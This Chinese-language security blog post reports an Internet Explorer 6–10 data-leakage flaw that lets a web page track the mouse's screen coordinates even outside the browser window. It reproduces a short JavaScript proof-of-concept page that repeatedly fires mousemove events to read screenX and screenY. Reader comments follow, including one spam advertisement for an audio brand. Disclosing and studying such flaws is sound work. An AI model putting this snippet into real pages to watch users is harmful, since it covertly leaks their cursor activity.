IE浏览器鼠标坐标跟踪安全风险,通杀Ie全版本

/ 10评 / 0

最近在Seclist上又看到了IE漏洞。该漏洞的主要影响是能够跟踪鼠标坐标位置,即使当前鼠标位置位于非浏览器窗口。该漏洞最先被spider.io团队发现。

影响版本:IE6-10

20121213172845_34794

 

Code:

<!DOCTYPE html>
<html>
<head>
<meta charset="utf-8" />
<title>Exploit Demo</title>
<script type="text/javascript">
window.attachEvent("onload", function() {
var detector = document.getElementById("detector");
detector.attachEvent("onmousemove", function (e) {
detector.innerHTML = e.screenX + ", " + e.screenY;
});
setInterval(function () {
detector.fireEvent("onmousemove");
}, 100);
});
</script>
</head>
<body>
<div id="detector"></div>
<div style="display:none"><b></b>
</div>
</body>
</html>

原文链接:http://spider.io/blog/2012/12/internet-explorer-data-leakage/

10 responses to “IE浏览器鼠标坐标跟踪安全风险,通杀Ie全版本”

  1. lu5704 says:

    额,这么多漏洞

  2. relarks says:

    ReLarks品牌源于瑞典,最初产品主要是(高端)音频配件产品,随着音频系统的发展,ReLarks引进大批技术人员,逐渐向音频扩声系统产品拓展,于1996年研发出自己的专业音箱产品,并广泛应用于欧洲各国。由于后期市场开拓不力及金融危机的冲击导致市场销售全面压缩,企业最终只保留了核心研发团队和少量的管理人员,资本引进后公司进行了全面性的转型,将主营业务由原来的音频配件转入到专业音箱、功放及相关的音频处理设备上去,从此企业进入了一个高速发展时期。21世纪初伴随着中国经济的迅猛发展,中国音响行业的迅速壮大及对专业技术的渴望,2007年ReLarks品牌及先进技术进入中国,为了更适应中国市场行情,公司组建了优秀的专业研发团队,将ReLarks的技术进一步的完善并将现代的数字技术与其兼容,生产出更完美的产品。经过不断发展及持续创新,ReLarks产品的优秀性能受到了音响界及用户的广泛好评。 ReLarks专注于高端的专业扩声系统,产品被广泛的应用于各种会议室,报告厅,播音室,影剧院,音乐厅,KTV等场所。 现在ReLarks将自己的研发实验室设置在信息技术领先的杭州,并将生产加工基地设置在中国最大的音响设备生产基地广州番禺。新的历史时期,ReLarks将以更加成熟的经验技术,高度的敬业精神,一如既往的为社会各界提供更优质的产品和更完善的服务! ReLarks勇于开拓,大量吸取国内外高新技术和高级技术人才,在激烈竞争的市场经济大环境下,通过不懈的努力,在同行业中为自己赢得一席之地。

  3. lala says:

    这个是干什么滴!?

  4. Jr says:

    话说这漏洞没什么用

Leave a Reply

Your email address will not be published. Required fields are marked *